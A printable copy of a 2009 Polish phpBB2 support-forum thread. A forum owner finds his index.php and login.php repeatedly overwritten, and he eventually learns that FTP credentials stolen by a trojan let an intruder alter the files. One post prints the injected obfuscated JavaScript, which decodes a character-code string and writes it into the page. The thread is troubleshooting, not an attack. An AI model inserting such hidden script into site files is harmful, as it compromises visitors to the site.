Zobacz temat - nic nie zrobiłem i wyskoczył taki błąd

To jest tylko wersja do druku, aby zobaczyć pełną wersję tematu, kliknij TUTAJ
	phpBB2 by Przemo Support forów phpBB2 modified by Przemo

Ogólne - nic nie zrobiłem i wyskoczył taki błąd

They2 - 12-02-2009, 22:29

Tavaro napisał/a:

They2, tutaj masz opisane: http://www.experts-exchan...Q_24120536.html

pokazujesz mnie linka do strony z zainfekowanym wirusem ? avast wykryl i musialem przerwac.

Tavaro, ten kod co napisales to nie ode mnie, lecz jego.. wstawilem czysty kod z paczka.

Tavaro - 12-02-2009, 22:36

They2 napisał/a:

pokazujesz mnie linka do strony z zainfekowanym wirusem ? avast wykryl i musialem przerwac.

Yyy? Mnie tam avast nic nie wykrył - może masz heurystykę zbyt wysoko ustawioną i traktuje przykładowy kod z zaencjowanymi nawiasami jako js injection. A co do drugiego zagadnienia - nie miałem na myśli, że od Ciebie, tylko że podałeś go w swoim poście.

They2 - 13-02-2009, 01:13

mam ustawiony standartowo i dobrze zabezpieczony avast.
nie jest az tak zle.

Mateusz61 - 13-02-2009, 21:55

Tavaro, They2 dziś wgrałem forum_images i ustawiłem sobie ikonki i znowu to się stało...

[ Dodano: 14-02-2009, 21:45 ]
ludzie weź cie pomóżcie ciągle mi się to nadpisuje...co to ma być...nie ma mnie wracam do domu wchodzę a to znowu się stało...
ciągle z:

Kod:

echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta http-equiv="refresh" content="0; url=' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1"><title>Redirect</title></head><body><div align="center">If your browser does not support meta redirection please click <a href="' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1">HERE</a> to be redirected</div></body></html>';

robi mi się:

Kod:

echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta http-equiv="refresh" content="0; url=' . $server_protocol . $server_name . $server_port . $script_name. '/index.'.$phpEx . '?redir=1"><title>Redirect</title></head><body><script language="JavaScript">function rkfg(jflq){return String.fromCharCode(jflq);}var ohhe="0601051021";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done';document.write(ifdm);</script>

w plikach index.php w linijce 66
oraz w login.php w linijce 104

Radek - 14-02-2009, 22:14

A czemu masz taki syf w plikach? http://shenlong.pl/phpforum/check_files.php
common.php nawet edytowałeś?

Napisz jakie mody wgrywałeś. Robiłeś to sam, czy ktoś Ci je instalował?

Mateusz61 - 15-02-2009, 10:08

add new user agent
google_sitemaps_14
Forum_Permissions_List_3.0_Przemo_ver
FORUM IMAGES by QBS
GoogleMapBeta233
Ajax Post Preview
BBCode-YouTuber-mod-v1.0
Rangi
intro
Errors Page
Najwięksi Krzykacze w Shoutboksie
cm_mod_by_knofel_v0_7
Zmiana wyglądu Przyjaciół by lui754
Code No Guests
Beer_2.3
QuickOpenClosedTopic
Users Profile Panel
znajomi_phpbb_update
ShadowMan 1.1
bash_random_latin2
ShoutBox Smilles
Regulamin_2.0
PM on register
Off tag Gość
Warnings info in viewtopic by lui754
Specified Post Warn
Avatar Domyślny
bash_random_quote

no trochę tego jest

common.php no na przykład w beer mod trzeba modyfikować...

dziś znowu to wyskoczyło
od razu rano jak wszedłem...

Jedyne co zmieniałem w index.php to w beer mod

Kod:

#
#-----[ OPEN ]--------------------------------------------------------
#

index.php

#
#-----[ FIND ]--------------------------------------------------------
#

//
// Start session management
//
$userdata = session_pagestart($user_ip, PAGE_INDEX);
init_userprefs($userdata);
//
// End session management
//

#
#-----[ AFTER, ADD ]--------------------------------------------------
#

// MOD Beer 2.3
$beermod->init(__FILE__);

Radek - 15-02-2009, 13:01

Wszystkie mody wgrywałeś sam? Nikt nie ma dostępu do ftp?
Masz mocno zmodyfikowane pliki, wiec ciezko powiedziec co ten kod js dopisuje. Masz na hostingu tylko forum czy jeszcze jakis serwis? Mozliwe, ze trzmasz na ftp jakis plik, ktory edytuje inne i dopisuje ten kod.

Mateusz61 - 15-02-2009, 14:44

RuseK wszystko sam zrobiłem nikt nie miał dostępu do FTP...
wreszcie dodzwoniłem się do administratora serwera
ktoś mi z TC pobrał trojanem na moim kompie hasła FTP
i się bawił podmieniając te pliki

już jest ok kosz chyba

Idź do strony: « 1 2